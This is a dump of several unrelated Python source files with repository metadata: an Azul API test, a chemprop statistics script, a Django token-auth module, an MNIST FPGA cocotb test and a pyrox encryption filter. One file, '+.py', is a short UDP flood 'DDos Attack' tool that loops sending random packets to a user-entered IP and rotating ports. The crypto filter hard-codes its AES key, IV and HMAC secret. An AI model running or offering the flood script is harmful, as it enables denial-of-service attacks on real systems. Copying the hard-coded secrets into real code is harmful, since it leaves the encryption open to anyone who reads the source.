resume_from = 'work_dirs/1908/0805_T2_eft53_V1L_HMCR027_RATIO3_2LR_AGN_1X/eft53_htct027_whratio3_v1l_2lr_wd3e4_s123_nos_1x_0806_0546/epoch_9.pth'
workflow = [('train', 1)]
| 31.23 | 145 | 0.65578 |
ace8c14e43df670a0df81bcbd48e0000707bd935 | 2,918 | py | Python | test/service/test_repository_projects.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | test/service/test_repository_projects.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | test/service/test_repository_projects.py | NoopDog/azul | 37614eff627888065c7b0a277b3137b8a587ed51 | [
"Apache-2.0"
] | null | null | null | from more_itertools import (
one,
)
import requests
from azul.logging import (
configure_test_logging,
)
from service import (
WebServiceTestCase,
)
# noinspection PyPep8Naming
def setUpModule():
    """unittest module-level fixture: configure test logging once before any
    test in this module runs."""
    configure_test_logging()
class RepositoryProjectsEndpointTest(WebServiceTestCase):
    """Integration tests for the service's /index/projects endpoints."""
    # Set a seed so that we can test the detail response with a stable project ID
    seed = 123
    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # Populate the indices provided by the base class (presumably the
        # search backend the endpoint queries) once for all tests.
        cls._setup_indices()
    @classmethod
    def tearDownClass(cls):
        cls._teardown_indices()
        super().tearDownClass()
    def test_projects_response(self):
        """
        Verify some basic properties of the /index/projects response and
        that each hit in the response is equal to the single hit response
        of a request for one project (eg. /index/projects/{uuid})
        """
        def get_response_json(uuid=None):
            # Without a uuid this hits the listing endpoint; with one, the
            # single-project detail endpoint.
            url = f'{self.base_url}/index/projects/{uuid if uuid else ""}'
            response = requests.get(url, params=dict(catalog=self.catalog))
            response.raise_for_status()
            return response.json()
        def assert_file_type_summaries(hit):
            # Every hit is expected to carry exactly one non-empty summary.
            self.assertEqual(len(hit['fileTypeSummaries']), 1)
            self.assertIn('fileType', hit['fileTypeSummaries'][0])
            self.assertGreater(hit['fileTypeSummaries'][0]['count'], 0)
            self.assertGreater(hit['fileTypeSummaries'][0]['totalSize'], 0)
        # Exact set of top-level keys every hit must expose.
        hit_properties = {
            'protocols',
            'entryId',
            'projects',
            'samples',
            'specimens',
            'cellLines',
            'donorOrganisms',
            'organoids',
            'cellSuspensions',
            'fileTypeSummaries'
        }
        # Exact set of keys inside each hit's single 'projects' entry.
        projects_properties = {
            'projectTitle',
            'projectShortname',
            'laboratory',
            'projectDescription',
            'contributors',
            'publications',
            'arrayExpressAccessions',
            'geoSeriesAccessions',
            'insdcProjectAccessions',
            'insdcStudyAccessions',
            'supplementaryLinks',
            'matrices',
            'contributorMatrices'
        }
        response_json = get_response_json()
        self.assertIn('hits', response_json)
        self.assertGreater(len(response_json['hits']), 0)
        for hit in response_json['hits']:
            self.assertEqual(hit_properties, set(hit.keys()))
            self.assertEqual(projects_properties, set(one(hit['projects']).keys()))
            assert_file_type_summaries(hit)
            self.assertNotIn('projectSummary', hit)
            self.assertNotIn('files', hit)
            # The listing hit must match the detail response for the same project.
            single_hit = get_response_json(hit['entryId'])
            self.assertEqual(hit, single_hit)
        self.assertIn('pagination', response_json)
        self.assertIn('termFacets', response_json)
| 31.717391 | 83 | 0.600411 |
ace8c3a046cae9e44527b0db2ebf2d3babfe1fe8 | 1,255 | py | Python | +.py | ArthurAstronot/Delete | 41a1bc5b98e483f32a1e617004751429bd786a51 | [
"BSL-1.0"
] | 1 | 2021-12-05T14:25:56.000Z | 2021-12-05T14:25:56.000Z | +.py | ArthurAstronot/Delete | 41a1bc5b98e483f32a1e617004751429bd786a51 | [
"BSL-1.0"
] | null | null | null | +.py | ArthurAstronot/Delete | 41a1bc5b98e483f32a1e617004751429bd786a51 | [
"BSL-1.0"
] | null | null | null | import sys
import os
import time
import socket
import random
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1200)
##############
os.system("clear")
os.system("figlet DDos Attack")
print ("Author : PheXcReY-Galaxy")
print ("You Tube : https://www.youtube.com/c/PheXcReY-Galaxy")
print ("github : https://github.com/PheXcReY")
print ("Facebook : https://www.facebook.com/ArthurXzz")
ip = str(input("IP Target : ")
port = int(input("Port Target : ")
choice = str(input("Sudah Menyiapkan Virus?(y/n) : ")
times = int(input("Masukan Jumlah Paket Virus : ")
threads = int(input("Masukan Jumlah Kecepatan Virus : ")
os.system("clear")
os.system("figlet Attack Starting")
print ("[ ] 0% ")
time.sleep(5)
print ("[====== ] 25%")
time.sleep(5)
print ("[========== ] 50%")
time.sleep(5)
print ("[=============== ] 75%")
time.sleep(5)
print ("[====================] 100%")
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print(" ============== Mengirim Virus Corona Ke Target Dan Memberikan Permen Lolipop ============ ")
sock.sendto(bytes, (ip,port))
if port == 65534:
port = 1
| 27.282609 | 105 | 0.58008 |
ace8c620cb8a5b1abdc6b6e4c94487ecdaa10a70 | 6,552 | py | Python | scripts/wilcoxon_significance.py | suleymanov/chemprop | 9d21f8810f22794a377a255e3f1f591c93c307dc | [
"MIT"
] | 3 | 2021-11-03T00:46:20.000Z | 2022-01-04T17:50:50.000Z | scripts/wilcoxon_significance.py | suleymanov/chemprop | 9d21f8810f22794a377a255e3f1f591c93c307dc | [
"MIT"
] | 1 | 2020-08-12T05:38:38.000Z | 2020-08-12T05:38:38.000Z | scripts/wilcoxon_significance.py | suleymanov/chemprop | 9d21f8810f22794a377a255e3f1f591c93c307dc | [
"MIT"
] | 2 | 2021-01-23T04:59:14.000Z | 2021-06-03T20:44:08.000Z | from collections import OrderedDict, namedtuple
import os
from typing import List, Optional, Tuple
from typing_extensions import Literal
import numpy as np
from scipy.stats import wilcoxon
from tqdm import tqdm
from tap import Tap # pip install typed-argument-parser (https://github.com/swansonk14/typed-argument-parser)
from chemprop.train.evaluate import evaluate_predictions
from chemprop.utils import mean_absolute_error, rmse, roc_auc_score, prc_auc
FAKE_LOGGER = namedtuple('FakeLogger', ['info'])(info=lambda x: None)
DATASETS = OrderedDict()
DATASETS['qm7'] = {'metric': mean_absolute_error, 'type': 'regression'}
DATASETS['qm8'] = {'metric': mean_absolute_error, 'type': 'regression'}
DATASETS['qm9'] = {'metric': mean_absolute_error, 'type': 'regression'}
DATASETS['delaney'] = {'metric': rmse, 'type': 'regression'}
DATASETS['freesolv'] = {'metric': rmse, 'type': 'regression'}
DATASETS['lipo'] = {'metric': rmse, 'type': 'regression'}
DATASETS['pdbbind_full'] = {'metric': rmse, 'type': 'regression'}
DATASETS['pdbbind_core'] = {'metric': rmse, 'type': 'regression'}
DATASETS['pdbbind_refined'] = {'metric': rmse, 'type': 'regression'}
DATASETS['pcba'] = {'metric': prc_auc, 'type': 'classification'}
DATASETS['muv'] = {'metric': prc_auc, 'type': 'classification'}
DATASETS['hiv'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['bace'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['bbbp'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['tox21'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['toxcast'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['sider'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['clintox'] = {'metric': roc_auc_score, 'type': 'classification'}
DATASETS['chembl'] = {'metric': roc_auc_score, 'type': 'classification'}
# test if 1 is better than 2 (less error, higher auc)
COMPARISONS = [
('default', 'random_forest'),
('default', 'ffn_morgan'),
('default', 'ffn_morgan_count'),
('default', 'ffn_rdkit'),
('features_no_opt', 'default'),
('hyperopt_eval', 'default'),
('hyperopt_ensemble', 'default'),
('hyperopt_eval', 'features_no_opt'),
('hyperopt_ensemble', 'hyperopt_eval'),
('default', 'undirected'),
('default', 'atom_messages'),
('hyperopt_eval', 'compare_lsc_scaffold')
]
EXPERIMENTS = sorted({exp for comp in COMPARISONS for exp in comp})
class Args(Tap):
    """Typed command-line arguments (parsed by typed-argument-parser)."""
    preds_dir: str  # Path to a directory containing predictions
    split_type: Literal['random', 'scaffold']  # Split type
def load_preds_and_targets(preds_dir: str,
                           experiment: str,
                           dataset: str,
                           split_type: str) -> Tuple[Optional[np.ndarray],
                                                     Optional[np.ndarray]]:
    """Load and concatenate per-fold prediction/target arrays for one
    experiment/dataset/split combination.

    Looks for up to 10 fold directories named
    ``<preds_dir>/417_<experiment>/<dataset>/<split_type>/<fold>`` containing
    ``preds.npy`` and ``targets.npy``. Returns ``(None, None)`` unless exactly
    3 or 10 complete folds are found.
    """
    pred_arrays = []
    target_arrays = []
    for fold in range(10):
        fold_dir = os.path.join(preds_dir, f'417_{experiment}', dataset, split_type, str(fold))
        fold_preds = os.path.join(fold_dir, 'preds.npy')
        fold_targets = os.path.join(fold_dir, 'targets.npy')
        # Skip folds where either file is missing; only complete pairs count.
        if os.path.exists(fold_preds) and os.path.exists(fold_targets):
            pred_arrays.append(np.load(fold_preds))
            target_arrays.append(np.load(fold_targets))
    # Runs were done with either 3-fold or 10-fold cross-validation.
    if len(pred_arrays) not in (3, 10):
        print(f'Did not find 3 or 10 preds/targets files for experiment "{experiment}" and dataset "{dataset}" and split type "{split_type}"')
        return None, None
    stacked_preds = np.concatenate(pred_arrays, axis=0)
    stacked_targets = np.concatenate(target_arrays, axis=0)
    assert stacked_preds.shape == stacked_targets.shape
    return stacked_preds, stacked_targets
def compute_values(dataset: str,
                   preds: List[List[List[float]]],
                   targets: List[List[List[float]]]) -> List[float]:
    """Evaluate each (pred, target) chunk pair with the dataset's metric and
    return the nan-mean metric value per chunk."""
    num_tasks = len(preds[0][0])
    dataset_info = DATASETS[dataset]
    mean_values = []
    for chunk_preds, chunk_targets in tqdm(zip(preds, targets), total=len(preds)):
        chunk_metrics = evaluate_predictions(
            preds=chunk_preds,
            targets=chunk_targets,
            num_tasks=num_tasks,
            metric_func=dataset_info['metric'],
            dataset_type=dataset_info['type'],
            logger=FAKE_LOGGER
        )
        # Average over tasks, ignoring NaN entries from empty tasks.
        mean_values.append(np.nanmean(chunk_metrics))
    return mean_values
def wilcoxon_significance(preds_dir: str, split_type: str):
    """Print a tab-separated table of one-sided Wilcoxon signed-rank p-values,
    one row per dataset and one column per (experiment_1, experiment_2) pair
    in COMPARISONS.

    :param preds_dir: root directory holding the saved predictions/targets.
    :param split_type: data split to evaluate ('random' or 'scaffold').
    """
    # Header row: one column per comparison.
    print('dataset\t' + '\t'.join([f'{exp_1} vs {exp_2}' for exp_1, exp_2 in COMPARISONS]))
    for dataset in DATASETS:
        dataset_type = DATASETS[dataset]['type']
        # Compute values
        experiment_to_values = {}
        for experiment in EXPERIMENTS:
            # The LSC-scaffold comparison only exists for scaffold splits.
            if experiment == 'compare_lsc_scaffold' and split_type != 'scaffold':
                continue
            preds, targets = load_preds_and_targets(preds_dir, experiment, dataset, split_type)  # num_molecules x num_targets
            if preds is None or targets is None:
                experiment_to_values[experiment] = None
                continue
            # Regression: one chunk per molecule; classification: 30 chunks --
            # these chunk-level metric values become the paired samples.
            if dataset_type == 'regression':
                preds, targets = [[pred] for pred in preds], [[target] for target in targets]
            else:
                preds, targets = np.array_split(preds, 30), np.array_split(targets, 30)
            values = compute_values(dataset, preds, targets)
            experiment_to_values[experiment] = values
        print(dataset, end='\t')
        # Compute p-values
        for experiment_1, experiment_2 in COMPARISONS:
            if 'compare_lsc_scaffold' in [experiment_1, experiment_2] and split_type != 'scaffold':
                continue
            values_1, values_2 = experiment_to_values[experiment_1], experiment_to_values[experiment_2]
            if values_1 is None or values_2 is None:
                print('Error', end='\t')
                continue
            assert len(values_1) == len(values_2)
            # Remove nans
            values_1, values_2 = zip(*[(v_1, v_2) for v_1, v_2 in zip(values_1, values_2) if not (np.isnan(v_1) or np.isnan(v_2))])
            # test if error of 1 is less than error of 2
            # ('less' for regression metrics where lower is better, 'greater'
            # for classification AUC-style metrics where higher is better)
            print(wilcoxon(values_1, values_2, alternative='less' if dataset_type == 'regression' else 'greater').pvalue, end='\t')
        print()
if __name__ == '__main__':
    # Parse CLI flags and print the significance table to stdout.
    args = Args().parse_args()
    wilcoxon_significance(
        preds_dir=args.preds_dir,
        split_type=args.split_type,
    )
| 37.872832 | 142 | 0.638278 |
ace8c7356129c72faa3276a50a9746a9bef0fcdc | 41 | py | Python | tests/mturk/__init__.py | ericotjo001/neuron-descriptions | 744fbf65c6538edd2fa423108eca7e2cd72f8b59 | [
"MIT"
] | 5 | 2022-02-22T21:58:10.000Z | 2022-03-22T16:19:14.000Z | tests/mturk/__init__.py | ericotjo001/neuron-descriptions | 744fbf65c6538edd2fa423108eca7e2cd72f8b59 | [
"MIT"
] | 3 | 2022-02-27T06:43:34.000Z | 2022-03-18T08:30:30.000Z | tests/mturk/__init__.py | ericotjo001/neuron-descriptions | 744fbf65c6538edd2fa423108eca7e2cd72f8b59 | [
"MIT"
] | 1 | 2022-02-27T05:18:30.000Z | 2022-02-27T05:18:30.000Z | """Unit tests for `src.mturk` module."""
| 20.5 | 40 | 0.634146 |
ace8c7f111e1b0c9ce7d1aae2b3ceffcd9fb2c92 | 3,796 | py | Python | sdks/bkpaas-auth/bkpaas_auth/core/token.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | 1 | 2022-03-03T02:23:00.000Z | 2022-03-03T02:23:00.000Z | sdks/bkpaas-auth/bkpaas_auth/core/token.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | null | null | null | sdks/bkpaas-auth/bkpaas_auth/core/token.py | piglei/bkpaas-python-sdk | 3dfea8be5702ccea1228691c6c1c3e87a27238d2 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Access token for blueking
"""
import datetime
import logging
from django.utils.timezone import now
from bkpaas_auth.conf import bkauth_settings
from bkpaas_auth.core.constants import ProviderType
from bkpaas_auth.core.exceptions import InvalidTokenCredentialsError, ServiceError
from bkpaas_auth.core.http import http_get
from bkpaas_auth.core.user_info import BkUserInfo, RtxUserInfo, UserInfo
from bkpaas_auth.models import User
logger = logging.getLogger(__name__)
class AbstractRequestBackend:
    """Interface for backends that resolve a username from login credentials."""
    def request_username(self, **credentials):
        """Get username through credentials.

        :param credentials: backend-specific credential fields.
        :return: the resolved username string.
        :raises NotImplementedError: subclasses must override this method.
        """
        # Previously this returned None implicitly, letting a missing override
        # fail far from the cause; fail loudly at the call site instead.
        raise NotImplementedError('subclasses must implement request_username')
class TokenRequestBackend(AbstractRequestBackend):
    """Resolves usernames by verifying blueking (BK) login cookies."""
    provider_type = ProviderType.BK
    def request_username(self, **credentials):
        """Get username through credentials.

        :raises ServiceError: if the verify endpoint cannot be reached.
        :raises InvalidTokenCredentialsError: if the service rejects the credentials.
        """
        is_success, resp = http_get(bkauth_settings.USER_COOKIE_VERIFY_URL, params=credentials, timeout=10)
        if not is_success:
            raise ServiceError('unable to fetch token services')
        # The API responds with: {"result": true, "code": 0, "message": "", "data": {"bk_username": "xxx"}}
        if resp.get('code') != 0:
            logger.error(
                f'Get user fail, url: {bkauth_settings.USER_COOKIE_VERIFY_URL}, '
                f'params: {credentials}, response: {resp}'
            )
            raise InvalidTokenCredentialsError('Invalid credentials given')
        return resp["data"]["bk_username"]
class RequestBackend(AbstractRequestBackend):
    """Resolves usernames for the RTX provider via the cookie-verify service."""
    provider_type = ProviderType.RTX
    def request_username(self, **credentials):
        """Get username through credentials.

        :raises ServiceError: if the verify endpoint cannot be reached.
        :raises InvalidTokenCredentialsError: if the service rejects the credentials.
        """
        is_success, resp = http_get(bkauth_settings.USER_COOKIE_VERIFY_URL, params=credentials, timeout=10)
        if not is_success:
            raise ServiceError('unable to fetch token services')
        # The API responds with: {"msg": "", "data": {"username": "xxx"}, "ret": 0}
        if resp.get('ret') != 0:
            logger.error(
                f'Get user fail, url: {bkauth_settings.USER_COOKIE_VERIFY_URL}, '
                f'params: {credentials}, response: {resp}'
            )
            raise InvalidTokenCredentialsError('Invalid credentials given')
        return resp["data"]["username"]
class LoginToken:
    """Access token object.

    Wraps a login token string together with its issue/expiry times and the
    user info resolved for it (anonymous until populated via make_user()).
    """
    # NOTE(review): not referenced within this module; presumably used by
    # callers as an expiry safety margin in seconds.
    token_timeout_margin = 300
    def __init__(self, login_token=None, expires_in=None):
        """
        :param login_token: the raw token string; required.
        :param expires_in: token lifetime in seconds; required.
        :raises ValueError: if either argument is missing or falsy.
        """
        # Validate with explicit exceptions instead of `assert`, which is
        # silently stripped when Python runs with the -O flag.
        if not login_token:
            raise ValueError('Must provide token string')
        if not expires_in:
            raise ValueError('Must provide expires_in seconds')
        self.login_token = login_token
        self.expires_at = now() + datetime.timedelta(seconds=expires_in)
        self.issued_at = now()
        self.user_info = UserInfo(username='AnonymousUser')
    def __str__(self):
        return 'token: {} expires_at: {}'.format(self.login_token, self.expires_at)
    def expired(self):
        """Return True if the token's expiry time has passed."""
        return self.expires_at < now()
    def make_user(self, provider_type):
        """Tag the token's user info with *provider_type* and build a User from it."""
        self.user_info.provider_type = provider_type
        return create_user_from_token(self)
def mocked_create_user_from_token(
    token: LoginToken, provider_type: int = ProviderType.RTX, username: str = bkauth_settings.MOCKED_USER_NAME
) -> User:
    """Mocked create_user function, only for temporary use.

    Fills the token's user info with fabricated data for the given provider
    instead of consulting any backend service, then builds a User from it.

    :raises ValueError: if provider_type is neither RTX nor BK.
    """
    if provider_type == ProviderType.RTX:
        token.user_info = RtxUserInfo(
            LoginName=username,
            ChineseName=username,
        )
    elif provider_type == ProviderType.BK:
        token.user_info = BkUserInfo(bk_username=username, chname=username, email='', phone='')
    else:
        raise ValueError('Invalid provider_type given.')
    return create_user_from_token(token)
def create_user_from_token(token: LoginToken) -> User:
    """Create a user object from user info dict"""
    # Delegate population of the User's fields to the token's user-info object.
    user = User(token=token)
    return token.user_info.provide(user)
| 35.148148 | 110 | 0.682561 |
ace8ca5d9945dec979e1e5f10f1d8bd6401be1d7 | 27 | py | Python | visvmtagger/__init__.py | kanjirz50/viet-morphological-analysis-svm | 7535a56cc0a63342bda14f39abbca1161e8cb93c | [
"MIT"
] | 7 | 2016-03-26T13:12:16.000Z | 2019-10-26T04:31:14.000Z | visvmtagger/__init__.py | kanjirz50/viet-morphological-analysis-svm | 7535a56cc0a63342bda14f39abbca1161e8cb93c | [
"MIT"
] | 3 | 2016-05-29T09:13:13.000Z | 2017-02-27T05:27:09.000Z | visvmtagger/__init__.py | kanjirz50/viet-morphological-analysis-svm | 7535a56cc0a63342bda14f39abbca1161e8cb93c | [
"MIT"
] | 7 | 2016-03-30T03:35:52.000Z | 2019-10-26T04:31:17.000Z | from .tagger import Tagger
| 13.5 | 26 | 0.814815 |
ace8cab4374e8a3c1ad3fb01a2d39fca8a6c2132 | 4,537 | py | Python | test/test_mnist/test_mnist.py | pgfarley/deep-learning-fpga | 1ceb6334c3d0640fa26e1337cffb61fda9ec24ec | [
"MIT"
] | 1 | 2018-11-15T07:58:54.000Z | 2018-11-15T07:58:54.000Z | test/test_mnist/test_mnist.py | pgfarley/deep-learning-fpga | 1ceb6334c3d0640fa26e1337cffb61fda9ec24ec | [
"MIT"
] | 5 | 2018-10-29T06:50:38.000Z | 2018-10-29T09:42:11.000Z | test/test_mnist/test_mnist.py | pgfarley/deep-learning-fpga | 1ceb6334c3d0640fa26e1337cffb61fda9ec24ec | [
"MIT"
] | null | null | null | import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge, ReadOnly
from cocotb.binary import BinaryValue
from cocotb.result import TestFailure
import os
import struct
import math
import numpy as np
import sklearn as sk
import sklearn.neural_network
from binstr import bytes_to_b
def should_equal(expected, actual, epsilon=0):
    """Fail the cocotb test unless *actual* is within *epsilon* of *expected*."""
    difference = abs(expected - actual)
    if difference <= epsilon:
        return
    raise TestFailure(
        f'Expected {expected} found {actual}. Exceeds epsilon of {epsilon}'
    )
@cocotb.coroutine
def reset(dut):
    """Pulse the DUT's active-low reset for one clock cycle and deassert the
    input-enable strobe."""
    dut.reset_n = 0
    yield RisingEdge(dut.clk)
    dut.reset_n = 1
    dut.in_en = 0
    yield RisingEdge(dut.clk)
@cocotb.coroutine
def load_weights(dut, weights):
    """Stream per-layer weight matrices into the DUT's weight memory.

    Each value is scaled by 2**16 (fixed-point conversion, matching the
    /2**16 rescale done when reading the DUT's output) and written one per
    clock cycle at (layer, n, m) addresses with weights_en asserted.
    """
    yield RisingEdge(dut.clk)
    dut.weights_en = 1
    # NOTE(review): the loop variable shadows the `weights` parameter; this
    # works because enumerate() binds the iterator first, but renaming the
    # inner variable would be clearer.
    for weights_idx, weights in enumerate(weights):
        dut.weights_layer_address = weights_idx
        for n_idx, n in enumerate(weights):
            dut.weights_n_address = n_idx
            for m_idx, m in enumerate(n):
                dut.weights_m_address = m_idx
                # Scale the float weight into fixed-point integer form.
                dut.weights_data = int(m * math.pow(2, 16))
                yield RisingEdge(dut.clk)
    dut.weights_en = 0
    yield RisingEdge(dut.clk)
@cocotb.test()
def mnist_predict_1(dut):
    """End-to-end cocotb test: train a small MLP on MNIST in software, load
    its weights into the DUT, feed it one test image, and compare the
    hardware prediction with scikit-learn's within a small epsilon."""
    cocotb.fork(Clock(dut.clk, 2).start())
    nn = sk.neural_network.MLPRegressor(
    # nn = sk.neural_network.MLPClassifier(
        activation='relu',
        hidden_layer_sizes=(10,)
    )
    # Parse the raw IDX-format MNIST training images and labels
    # (16-byte / 8-byte big-endian headers, then unsigned-byte payloads).
    with open("mnist/train-images.idx3-ubyte", "rb") as image_file:
        with open("mnist/train-labels.idx1-ubyte", "rb") as label_file:
            _, image_count, height, width = struct.unpack(
                '>iiii',
                image_file.read(16)
            )
            _, label_count = struct.unpack('>ii', label_file.read(8))
            image_data = np.array(
                struct.unpack(
                    f"{width*height*image_count}B",
                    image_file.read(width * height*image_count)
                )
            ).reshape(image_count, width*height)
            label_data = np.array(
                struct.unpack(
                    f"{label_count}B",
                    label_file.read(image_count)
                )
            ).reshape(-1,)
    # NOTE(review): trains from scratch on every run -- slow, but keeps the
    # software reference and the weights loaded into the DUT in sync.
    nn.fit(image_data, label_data)
    # Prepend each layer's intercepts as row 0 so biases travel with the
    # weight matrices when written into the DUT.
    weights = [
        np.insert(nn.coefs_[0], 0, nn.intercepts_[0], axis=0),
        np.insert(nn.coefs_[1], 0, nn.intercepts_[1], axis=0)
    ]
    print(weights)
    print(np.array(weights).shape)
    print(np.array(weights[0]).shape)
    print(np.array(weights[1]).shape)
    yield reset(dut)
    yield load_weights(dut, weights)
    # Parse the MNIST test set the same way and compute the software
    # reference prediction for test image index 1.
    with open("mnist/t10k-images.idx3-ubyte", "rb") as image_file:
        with open("mnist/t10k-labels.idx1-ubyte", "rb") as label_file:
            _, image_count, height, width = struct.unpack(
                '>iiii',
                image_file.read(16)
            )
            _, label_count = struct.unpack('>ii', label_file.read(8))
            image_data = np.array(
                struct.unpack(
                    f"{width*height*image_count}B",
                    image_file.read(width * height*image_count)
                )
            ).reshape(image_count, width*height)
            label_data = np.array(
                struct.unpack(
                    f"{label_count}B",
                    label_file.read(image_count)
                )
            ).reshape(-1,)
    prediction = nn.predict(image_data[1].reshape(1,image_data.shape[1]))
    # NOTE(review): the reference prediction above uses test image index 1,
    # but the raw read below (784 bytes right after the 16-byte header) is
    # image index 0 -- confirm which image the DUT is meant to see.
    print(label_data[1])
    print(prediction)
    with open("mnist/t10k-images.idx3-ubyte", "rb") as image_file:
        _ = image_file.read(16)
        data = image_file.read(784)
    input_data = BinaryValue()
    input_data.binstr = bytes_to_b(data)
    print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
    print(input_data.buff)
    print("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
    dut.in_data = input_data
    dut.in_en = 1
    yield RisingEdge(dut.out_en)
    yield ReadOnly()
    # The DUT output is fixed point scaled by 2**16 (see load_weights);
    # rescale to float before comparing with the software prediction.
    should_equal(
        prediction[0],
        dut.out_data.value.signed_integer / math.pow(2, 16),
        epsilon=0.01)
    print(dut.out_data.value.signed_integer / math.pow(2, 16))
    print(dut.out_data)
    print(prediction[0])
    print(prediction[0] - dut.out_data.value.signed_integer / math.pow(2, 16))
| 30.246667 | 86 | 0.549262 |
ace8cb8de8f6e2d6e8f80477abd5200064e53cb1 | 6,969 | py | Python | pyrox/portcullis/crypto_filter.py | jfwood/pyrox | 5963d4a89cb795aba777f960e9ceba7ff2244bd2 | [
"MIT"
] | 1 | 2020-04-07T10:15:07.000Z | 2020-04-07T10:15:07.000Z | pyrox/portcullis/crypto_filter.py | jfwood/pyrox | 5963d4a89cb795aba777f960e9ceba7ff2244bd2 | [
"MIT"
] | null | null | null | pyrox/portcullis/crypto_filter.py | jfwood/pyrox | 5963d4a89cb795aba777f960e9ceba7ff2244bd2 | [
"MIT"
] | null | null | null | import pyrox.filtering as filtering
from Crypto.Cipher import AES
from Crypto.Hash import HMAC, SHA256
import requests
class CryptoFilter(filtering.HttpFilter):
    """
    This filter encrypts/decrypts data streamed through it on its way
    to/from a Swift encrypted volume.

    PUT request bodies are encrypted on upload, GET response bodies are
    decrypted on download, and an HMAC-SHA256 digest of the ciphertext is
    accumulated so it can be published/compared as object metadata.
    """
    # Direction markers for process_chunk().
    REQUEST = 0
    RESPONSE = 1
    def __init__(self):
        super(CryptoFilter, self).__init__()
        print("initing new filter")
        #TODO(jwood) Just need one of these processors.
        self.processor_upload = SampleCryptoProcessor(is_encrypt=True)
        self.processor_download = SampleCryptoProcessor(is_encrypt=False)
        self.request_method = None
        # NOTE(review): hard-coded HMAC key -- acceptable in a sample, but
        # must come from managed key material before real use.
        self.hmac = HMAC.new("secretkey", digestmod=SHA256.new())
    @filtering.handles_request_head
    def on_request_head(self, request_head):
        """Record the request verb, URL and auth token for later use."""
        print(">>>>>>> {}".format(self))
        print('Got request head with verb: {}'.format(request_head.method))
        self.request_method = request_head.method
        self.url = request_head.url
        self.auth_token = request_head.header("X-Auth-Token").values[0]
    @filtering.handles_response_head
    def on_response_head(self, response_head):
        """After a successful PUT (201), publish the computed HMAC; also
        remember any digest header the server sent for later comparison."""
        print('Got response head with status: {}'.format(response_head.status))
        if response_head.status == '201' and self.request_method == 'PUT':
            self.set_hmac()
        hmac_digest = response_head.get_header("X-Object-Meta-Hmac-Digest")
        if hmac_digest:
            # NOTE(review): self.hmac_digest is only set when this header is
            # present, yet process_chunk() reads it unconditionally on the
            # download finish path -- AttributeError risk if it is absent.
            self.hmac_digest = hmac_digest.values[0]
    @filtering.handles_request_body
    def on_request_body(self, msg_part, output):
        """Must be able to handle the following conditions:
        1) The input is exactly the same size as modulo-block-size blocks of
        post-processed buffer output, so can send these along to the upstream server.
        2) The input data is not enough to create an output block, so can't send
        anything along to upstream yet.
        3) The input data is not an even block size, so can only send some
        blocks along to upstream (leaving some data in the buffer).
        4) The input data is empty/None indicating no more data to send along
        so need to send all final block(s) along to upstream.
        """
        # print('Got request content chunk: {}'.format(msg_part))
        # output.write(msg_part)
        print(">>>>>>>>>>>>>>>>>>>> req_body - req method: {}".format(self.request_method))
        # Only PUT bodies are encrypted; everything else passes through untouched.
        if not self.request_method == 'PUT':
            output.write(msg_part)
            return
        self.process_chunk(msg_part, self.REQUEST, output)
    @filtering.handles_response_body
    def on_response_body(self, msg_part, output):
        """Decrypt GET response bodies; pass all other responses through."""
        print('Got response content chunk')  # : {}'.format(msg_part))
        print(">>>>>>>>>>>>>>>>>>>> resp_body - req method: {}".format(self.request_method))
        if not self.request_method == 'GET':
            output.write(msg_part)
            return
        self.process_chunk(msg_part, self.RESPONSE, output)
    def process_chunk(self, msg_part, req_resp, output):
        """Run one body chunk through the appropriate crypto processor.

        The HMAC always covers the ciphertext: it is updated after encrypting
        on upload, and before decrypting on download. A falsy msg_part marks
        end-of-body and flushes the processor's buffered final block(s).
        """
        if msg_part:
            if req_resp == self.REQUEST:
                output_part = self.processor_upload.process_data(msg_part)
                self.hmac.update(output_part)
            else:
                self.hmac.update(msg_part)
                output_part = self.processor_download.process_data(msg_part)
            if output_part:
                print("!!!!! Output chunk...message length {}".format(len(msg_part)))  # .format(output_part))
                output.write(output_part)
            else:
                # Not enough buffered data for a full cipher block yet.
                print("!!!!! Not enough data for message length {}".format(len(msg_part)))
                output.write("")
        else:
            if req_resp == self.REQUEST:
                print('finishing request')
                output_part = self.processor_upload.finish()
            else:
                print('finishing response')
                output_part = self.processor_download.finish()
                # this stuff isn't being invoked right now
                print('done downloading. hmac should be {}'.format(self.hmac_digest))
                print('done downloading. hmac is {}'.format(self.hmac.hexdigest()))
            print("!!!!! Final: {}".format(output_part))
            output.write(output_part)
    def set_hmac(self):
        """POST the accumulated HMAC digest as object metadata on the
        uploaded object (uses the stored URL path and auth token)."""
        print("!!!!! start set hmac")
        # NOTE(review): storage endpoint host is hard-coded here.
        url = "https://storage101.dfw1.clouddrive.com:443" + self.url
        headers = {"X-Object-Meta-Hmac-Digest": self.hmac.hexdigest(),
                   "X-Auth-Token": self.auth_token}
        requests.post(url, headers=headers)
        print("!!!!! end set hmac")
#TODO(jwood) Consider adding a base Processor class, that this one extends?
class SampleCryptoProcessor(object):
    """Streaming AES-CBC encryptor/decryptor that buffers input so it only
    ever transforms whole cipher blocks, holding back the final (possibly
    padded) block until finish() is called.

    NOTE(review): the key and IV are hard-coded sample values; real
    deployments need proper key management.
    """
    def __init__(self, is_encrypt, block_size_bytes=16):
        self.block_size_bytes = block_size_bytes
        key = 'sixteen_byte_key'
        iv = 'sixteen_byte_iv!'
        # Bound once so process_data()/finish() stay direction-agnostic.
